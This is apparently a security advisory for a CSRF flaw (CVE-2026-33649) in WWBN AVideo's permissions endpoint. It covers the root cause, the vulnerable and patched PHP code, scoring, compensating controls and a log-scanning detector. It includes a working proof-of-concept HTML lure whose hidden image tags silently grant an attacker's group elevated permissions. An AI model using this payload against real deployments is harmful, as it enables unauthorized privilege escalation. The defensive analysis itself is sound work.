Mar 25, 2026 · 6 min read
A critical CSRF flaw in AVideo allows unauthenticated attackers to grant arbitrary permissions to user groups by tricking an administrator into visiting a malicious page. The endpoint improperly accepts GET requests and lacks token validation, exacerbated by a global SameSite=None cookie policy.
WWBN AVideo up to version 26.0 is vulnerable to a Cross-Site Request Forgery (CSRF) vulnerability in the permissions management endpoint. The vulnerability allows attackers to escalate privileges by forcing an authenticated administrator to execute state-changing GET requests without anti-CSRF token validation.
WWBN AVideo up to version 26.0 contains a Cross-Site Request Forgery (CSRF) vulnerability tracked as CVE-2026-33649. The flaw resides within the plugin/Permissions/setPermission.json.php endpoint, which is responsible for modifying user group access controls. By exploiting this vulnerability, an attacker can perform unauthorized state-changing operations on the application.
The vulnerable endpoint processes incoming requests to grant or revoke critical system privileges, such as video upload capabilities and user management rights. Because it fails to properly validate the origin and intent of these requests, it exposes a critical attack surface. Administrators managing the platform are the primary targets, as their elevated session privileges are required to execute the permission changes.
The attack vector relies on an attacker crafting a malicious web page that automatically triggers requests to the vulnerable AVideo endpoint. When an authenticated administrator visits this page, their browser executes the requests within the context of their active session. The application blindly trusts these requests, resulting in unauthorized privilege escalation for an attacker-controlled user group.
The root cause of CVE-2026-33649 is a combination of three distinct security misconfigurations interacting within the application architecture. First, the setPermission.json.php endpoint explicitly retrieves parameters using the $_REQUEST superglobal array. This implementation allows the endpoint to accept input via HTTP GET query strings, violating the standard practice of using POST requests for state-changing operations.
Second, the endpoint completely omits anti-CSRF token validation. While the AVideo application implements a global token validation function named isGlobalTokenValid(), developers failed to invoke this function within the permissions endpoint. Other administrative endpoints, such as saveSort.json.php, correctly implement this check, indicating a localized oversight rather than a systemic lack of CSRF protection mechanisms.
Third, the vulnerability is amplified by AVideo's session cookie configuration. The application explicitly sets ini_set('session.cookie_samesite', 'None'); in objects/include_config.php. This configuration is documented as an intentional choice to support cross-origin iframe embedding for video players. However, setting SameSite=None removes modern browser protections against cross-site request inclusion, allowing session cookies to be appended to GET requests initiated from arbitrary third-party domains.
An examination of the vulnerable code in plugin/Permissions/setPermission.json.php reveals the exact mechanism of the flaw. The script iterates over an array of expected parameters, extracting them directly from $_REQUEST without validating the HTTP method. It then passes these unvalidated, untrusted inputs directly to the Permissions::setPermission() method.
```php
// Vulnerable handler as shipped: every parameter is read from $_REQUEST, so it is
// accepted from a GET query string as readily as from a POST body, and no CSRF
// token is checked before the privilege change is applied.
$intvalList = array('users_groups_id','plugins_id','type','isEnabled');
foreach ($intvalList as $value) {
    if($_REQUEST[$value]==='true'){
        $_REQUEST[$value] = 1;
    }else{
        $_REQUEST[$value] = intval($_REQUEST[$value]);
    }
}
$obj = new stdClass();
$obj->id = Permissions::setPermission($_REQUEST['users_groups_id'], $_REQUEST['plugins_id'], $_REQUEST['type'], $_REQUEST['isEnabled']);
```

To remediate this vulnerability, the endpoint must be refactored to enforce strict HTTP method validation and token verification. The application must reject any request that does not use the POST method. Furthermore, it must call the existing isGlobalTokenValid() function before processing any input variables.
```php
// 1. Enforce POST method
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    die(json_encode(array('error' => 'POST method required')));
}
// 2. Enforce CSRF token
if (!isGlobalTokenValid()) {
    die(json_encode(array('error' => 'Invalid CSRF token')));
}
// 3. Read parameters from $_POST only, never from $_REQUEST
$intvalList = array('users_groups_id','plugins_id','type','isEnabled');
foreach ($intvalList as $value) {
    if($_POST[$value]==='true'){
        $_POST[$value] = 1;
    }else{
        $_POST[$value] = intval($_POST[$value]);
    }
}
$obj = new stdClass();
$obj->id = Permissions::setPermission($_POST['users_groups_id'], $_POST['plugins_id'], $_POST['type'], $_POST['isEnabled']);
```

Exploitation of CVE-2026-33649 requires the attacker to fulfill specific prerequisites. The target administrator must have an active, authenticated session with the AVideo application. The attacker must also identify the numeric ID of a user group they control (e.g., ID 2), which will be the recipient of the escalated privileges.
The attack methodology involves crafting a malicious HTML page designed to silently issue HTTP GET requests. The provided proof-of-concept uses hidden `<img>` tags whose src attributes point at the target endpoint with the required parameters appended to the URL. By placing several such tags on the page, the attacker can grant a series of permissions in a single page load.
```html
<!DOCTYPE html>
<html>
<head><title>Interesting Content</title></head>
<body>
<h1>Check out this video!</h1>
<!-- PERMISSION_FULLACCESSVIDEOS (type=10) -->
<img src='https://target.example.com/plugin/Permissions/setPermission.json.php?users_groups_id=2&plugins_id=1&type=10&isEnabled=true' style='display:none'>
<!-- PERMISSION_USERS (type=20) -->
<img src='https://target.example.com/plugin/Permissions/setPermission.json.php?users_groups_id=2&plugins_id=1&type=20&isEnabled=true' style='display:none'>
</body>
</html>
```

When the administrator renders this HTML page, the browser attempts to resolve the image sources. It automatically fires asynchronous GET requests to the AVideo server. Because the server configures session cookies with SameSite=None, the browser includes the administrator's authentication cookies in the cross-origin requests, resulting in successful privilege escalation.
The successful exploitation of CVE-2026-33649 results in significant security consequences for the affected AVideo deployment. An unauthenticated attacker leverages the administrator's session to elevate the privileges of their own user group. This drive-by compromise grants the attacker unauthorized access to administrative functions without requiring direct authentication credentials.
The specific permissions demonstrated in the proof-of-concept grant the attacker extensive control. By assigning PERMISSION_FULLACCESSVIDEOS and PERMISSION_USERS, the attacker gains the ability to manipulate platform content and manage other users. This lateral movement compromises both the confidentiality and integrity of the system data.
The vulnerability is assessed with a CVSS v3.1 base score of 8.1 (High), reflecting the critical nature of the flaw. The vector string (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N) highlights that while user interaction is required (UI:R), the attack is network-exploitable (AV:N), has low complexity (AC:L), and requires no privileges on the attacker's part (PR:N), since the victim administrator's session supplies them.
As of the publication date, no official patched release is available for WWBN AVideo to address CVE-2026-33649. Administrators operating affected systems must implement immediate manual remediations or compensating controls to secure their deployments. The primary recommendation is to manually patch the vulnerable PHP script as outlined in the code analysis section.
Administrators must modify plugin/Permissions/setPermission.json.php to explicitly enforce the POST HTTP method and require valid anti-CSRF tokens via the isGlobalTokenValid() function. All references to the $_REQUEST superglobal within this file must be replaced with $_POST to ensure parameters are not accepted via URL query strings.
In environments where direct code modification is not immediately feasible, compensating controls must be deployed. Security teams should implement Web Application Firewall (WAF) rules to explicitly block all GET requests targeting the /plugin/Permissions/setPermission.json.php URI path. Furthermore, administrators must practice strict session hygiene by avoiding general web browsing while maintaining an active session in the AVideo management console.
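As an added aid for the compensating-control phase (not code from the AVideo project or the original advisory), the following script scans web-server access logs for GET requests to the permissions endpoint, which the patched code would reject outright, and marks those whose Referer names another host, the signature of the image-tag delivery described above. It assumes Apache "combined" log format and a hostname of video.example.com for the monitored instance; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache "combined" format); not from a real deployment.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Mar/2026:10:01:02 +0000] "POST /plugin/Permissions/setPermission.json.php HTTP/1.1" 200 21 "https://video.example.com/plugin/Permissions/" "Mozilla/5.0"
203.0.113.7 - - [25/Mar/2026:10:03:15 +0000] "GET /plugin/Permissions/setPermission.json.php?users_groups_id=2&plugins_id=1&type=10&isEnabled=true HTTP/1.1" 200 21 "https://attacker.example/lure.html" "Mozilla/5.0"
203.0.113.7 - - [25/Mar/2026:10:03:15 +0000] "GET /plugin/Permissions/setPermission.json.php?users_groups_id=2&plugins_id=1&type=20&isEnabled=true HTTP/1.1" 200 21 "https://attacker.example/lure.html" "Mozilla/5.0"
198.51.100.4 - - [25/Mar/2026:10:05:40 +0000] "GET /view/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

TARGET_PATH = "/plugin/Permissions/setPermission.json.php"
SITE_HOST = "video.example.com"  # assumed hostname of the monitored AVideo instance

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)


def find_csrf_suspects(log_text, target_path=TARGET_PATH, site_host=SITE_HOST):
    """Return one finding per GET request to the permissions endpoint: the
    unpatched code honours GET via $_REQUEST, and a Referer from another
    host marks a cross-site page as the trigger (the CSRF delivery above)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        parts = urlsplit(m["target"])
        if m["method"] != "GET" or parts.path != target_path:
            continue
        params = {k: v[0] for k, v in parse_qs(parts.query).items()}
        ref_host = urlsplit(m["referer"]).hostname if m["referer"] != "-" else None
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),  # 200 means the unpatched server honoured the GET
            "cross_site": ref_host is not None and ref_host != site_host,
            "referer_host": ref_host,
            "users_groups_id": params.get("users_groups_id"),
            "type": params.get("type"),
            "isEnabled": params.get("isEnabled"),
        })
    return findings


if __name__ == "__main__":
    for finding in find_csrf_suspects(SAMPLE_LOG):
        print(finding)
```

Once the endpoint is patched to reject GET, any remaining hit in this report with status 200 indicates a host that has not yet received the fix.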
| Product | Affected Versions | Fixed Version |
|---|---|---|
| AVideo WWBN | <= 26.0 | - |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-352 |
| Attack Vector | Network |
| CVSS Score | 8.1 |
| EPSS Percentile | 2.59% |
| Exploit Status | Proof of Concept Available |
| CISA KEV | Not Listed |
CWE-352 (Cross-Site Request Forgery): The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.